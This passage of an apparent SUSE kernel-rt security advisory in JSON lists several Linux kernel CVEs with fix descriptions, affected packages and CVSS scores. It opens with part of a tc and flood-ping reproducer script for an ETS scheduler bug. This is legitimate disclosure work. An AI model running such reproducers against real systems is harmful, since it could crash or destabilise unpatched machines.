\"$SLOW_TBF_LAT\"\n\ntc filter add dev \"$DEV\" parent 1: protocol all prio 1 u32 match u32 0 0 flowid 1:2\ntc -s qdisc ls dev $DEV\n\nping -I \"$DEV\" -f -c \"$PING_COUNT\" -s \"$PING_BYTES\" -W 0.001 \"$PING_DST\" \\\n \u003e/dev/null 2\u003e\u00261 \u0026\ntc qdisc change dev \"$DEV\" root handle \"$ROOT_HANDLE\" ets bands 2 strict 0\ntc qdisc change dev \"$DEV\" root handle \"$ROOT_HANDLE\" ets bands 2 strict 2\ntc -s qdisc ls dev $DEV\ntc qdisc del dev \"$DEV\" parent \n---truncated---",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71066",
"url": "https://www.suse.com/security/cve/CVE-2025-71066"
},
{
"category": "external",
"summary": "SUSE Bug 1256645 for CVE-2025-71066",
"url": "https://bugzilla.suse.com/1256645"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-20T10:04:28Z",
"details": "important"
}
],
"title": "CVE-2025-71066"
},
{
"cve": "CVE-2025-71076",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71076"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm/xe/oa: Limit num_syncs to prevent oversized allocations\n\nThe OA open parameters did not validate num_syncs, allowing\nuserspace to pass arbitrarily large values, potentially\nleading to excessive allocations.\n\nAdd check to ensure that num_syncs does not exceed DRM_XE_MAX_SYNCS,\nreturning -EINVAL when the limit is violated.\n\nv2: use XE_IOCTL_DBG() and drop duplicated check. (Ashutosh)\n\n(cherry picked from commit e057b2d2b8d815df3858a87dffafa2af37e5945b)",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71076",
"url": "https://www.suse.com/security/cve/CVE-2025-71076"
},
{
"category": "external",
"summary": "SUSE Bug 1256627 for CVE-2025-71076",
"url": "https://bugzilla.suse.com/1256627"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-20T10:04:28Z",
"details": "moderate"
}
],
"title": "CVE-2025-71076"
},
{
"cve": "CVE-2025-71077",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71077"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ntpm: Cap the number of PCR banks\n\ntpm2_get_pcr_allocation() does not cap any upper limit for the number of\nbanks. Cap the limit to eight banks so that out of bounds values coming\nfrom external I/O cause on only limited harm.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71077",
"url": "https://www.suse.com/security/cve/CVE-2025-71077"
},
{
"category": "external",
"summary": "SUSE Bug 1256613 for CVE-2025-71077",
"url": "https://bugzilla.suse.com/1256613"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-20T10:04:28Z",
"details": "moderate"
}
],
"title": "CVE-2025-71077"
},
{
"cve": "CVE-2025-71078",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71078"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\npowerpc/64s/slb: Fix SLB multihit issue during SLB preload\n\nOn systems using the hash MMU, there is a software SLB preload cache that\nmirrors the entries loaded into the hardware SLB buffer. This preload\ncache is subject to periodic eviction - typically after every 256 context\nswitches - to remove old entry.\n\nTo optimize performance, the kernel skips switch_mmu_context() in\nswitch_mm_irqs_off() when the prev and next mm_struct are the same.\nHowever, on hash MMU systems, this can lead to inconsistencies between\nthe hardware SLB and the software preload cache.\n\nIf an SLB entry for a process is evicted from the software cache on one\nCPU, and the same process later runs on another CPU without executing\nswitch_mmu_context(), the hardware SLB may retain stale entries. If the\nkernel then attempts to reload that entry, it can trigger an SLB\nmulti-hit error.\n\nThe following timeline shows how stale SLB entries are created and can\ncause a multi-hit error when a process moves between CPUs without a\nMMU context switch.\n\nCPU 0 CPU 1\n----- -----\nProcess P\nexec swapper/1\n load_elf_binary\n begin_new_exc\n activate_mm\n switch_mm_irqs_off\n switch_mmu_context\n switch_slb\n /*\n * This invalidates all\n * the entries in the HW\n * and setup the new HW\n * SLB entries as per the\n * preload cache.\n */\ncontext_switch\nsched_migrate_task migrates process P to cpu-1\n\nProcess swapper/0 context switch (to process P)\n(uses mm_struct of Process P) switch_mm_irqs_off()\n switch_slb\n load_slb++\n /*\n * load_slb becomes 0 here\n * and we evict an entry from\n * the preload cache with\n * preload_age(). We still\n * keep HW SLB and preload\n * cache in sync, that is\n * because all HW SLB entries\n * anyways gets evicted in\n * switch_slb during SLBIA.\n * We then only add those\n * entries back in HW SLB,\n * which are currently\n * present in preload_cache\n * (after eviction).\n */\n load_elf_binary continues...\n setup_new_exec()\n slb_setup_new_exec()\n\n sched_switch event\n sched_migrate_task migrates\n process P to cpu-0\n\ncontext_switch from swapper/0 to Process P\n switch_mm_irqs_off()\n /*\n * Since both prev and next mm struct are same we don\u0027t call\n * switch_mmu_context(). This will cause the HW SLB and SW preload\n * cache to go out of sync in preload_new_slb_context. Because there\n * was an SLB entry which was evicted from both HW and preload cache\n * on cpu-1. Now later in preload_new_slb_context(), when we will try\n * to add the same preload entry again, we will add this to the SW\n * preload cache and then will add it to the HW SLB. Since on cpu-0\n * this entry was never invalidated, hence adding this entry to the HW\n * SLB will cause a SLB multi-hit error.\n */\nload_elf_binary cont\n---truncated---",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71078",
"url": "https://www.suse.com/security/cve/CVE-2025-71078"
},
{
"category": "external",
"summary": "SUSE Bug 1256616 for CVE-2025-71078",
"url": "https://bugzilla.suse.com/1256616"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-20T10:04:28Z",
"details": "moderate"
}
],
"title": "CVE-2025-71078"
},
{
"cve": "CVE-2025-71079",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71079"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet: nfc: fix deadlock between nfc_unregister_device and rfkill_fop_write\n\nA deadlock can occur between nfc_unregister_device() and rfkill_fop_write()\ndue to lock ordering inversion between device_lock and rfkill_global_mutex.\n\nThe problematic lock order is:\n\nThread A (rfkill_fop_write):\n rfkill_fop_write()\n mutex_lock(\u0026rfkill_global_mutex)\n rfkill_set_block()\n nfc_rfkill_set_block()\n nfc_dev_down()\n device_lock(\u0026dev-\u003edev) \u003c- waits for device_lock\n\nThread B (nfc_unregister_device):\n nfc_unregister_device()\n device_lock(\u0026dev-\u003edev)\n rfkill_unregister()\n mutex_lock(\u0026rfkill_global_mutex) \u003c- waits for rfkill_global_mutex\n\nThis creates a classic ABBA deadlock scenario.\n\nFix this by moving rfkill_unregister() and rfkill_destroy() outside the\ndevice_lock critical section. Store the rfkill pointer in a local variable\nbefore releasing the lock, then call rfkill_unregister() after releasing\ndevice_lock.\n\nThis change is safe because rfkill_fop_write() holds rfkill_global_mutex\nwhile calling the rfkill callbacks, and rfkill_unregister() also acquires\nrfkill_global_mutex before cleanup. Therefore, rfkill_unregister() will\nwait for any ongoing callback to complete before proceeding, and\ndevice_del() is only called after rfkill_unregister() returns, preventing\nany use-after-free.\n\nThe similar lock ordering in nfc_register_device() (device_lock -\u003e\nrfkill_global_mutex via rfkill_register) is safe because during\nregistration the device is not yet in rfkill_list, so no concurrent\nrfkill operations can occur on this device.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71079",
"url": "https://www.suse.com/security/cve/CVE-2025-71079"
},
{
"category": "external",
"summary": "SUSE Bug 1256619 for CVE-2025-71079",
"url": "https://bugzilla.suse.com/1256619"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.1,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-20T10:04:28Z",
"details": "moderate"
}
],
"title": "CVE-2025-71079"
},
{
"cve": "CVE-2025-71080",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71080"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nipv6: fix a BUG in rt6_get_pcpu_route() under PREEMPT_RT\n\nOn PREEMPT_RT kernels, after rt6_get_pcpu_route() returns NULL, the\ncurrent task can be preempted. Another task running on the same CPU\nmay then execute rt6_make_pcpu_route() and successfully install a\npcpu_rt entry. When the first task resumes execution, its cmpxchg()\nin rt6_make_pcpu_route() will fail because rt6i_pcpu is no longer\nNULL, triggering the BUG_ON(prev). It\u0027s easy to reproduce it by adding\nmdelay() after rt6_get_pcpu_route().\n\nUsing preempt_disable/enable is not appropriate here because\nip6_rt_pcpu_alloc() may sleep.\n\nFix this by handling the cmpxchg() failure gracefully on PREEMPT_RT:\nfree our allocation and return the existing pcpu_rt installed by\nanother task. The BUG_ON is replaced by WARN_ON_ONCE for non-PREEMPT_RT\nkernels where such races should not occur.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71080",
"url": "https://www.suse.com/security/cve/CVE-2025-71080"
},
{
"category": "external",
"summary": "SUSE Bug 1256608 for CVE-2025-71080",
"url": "https://bugzilla.suse.com/1256608"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 3.6,
"baseSeverity": "LOW",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:L/A:L",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
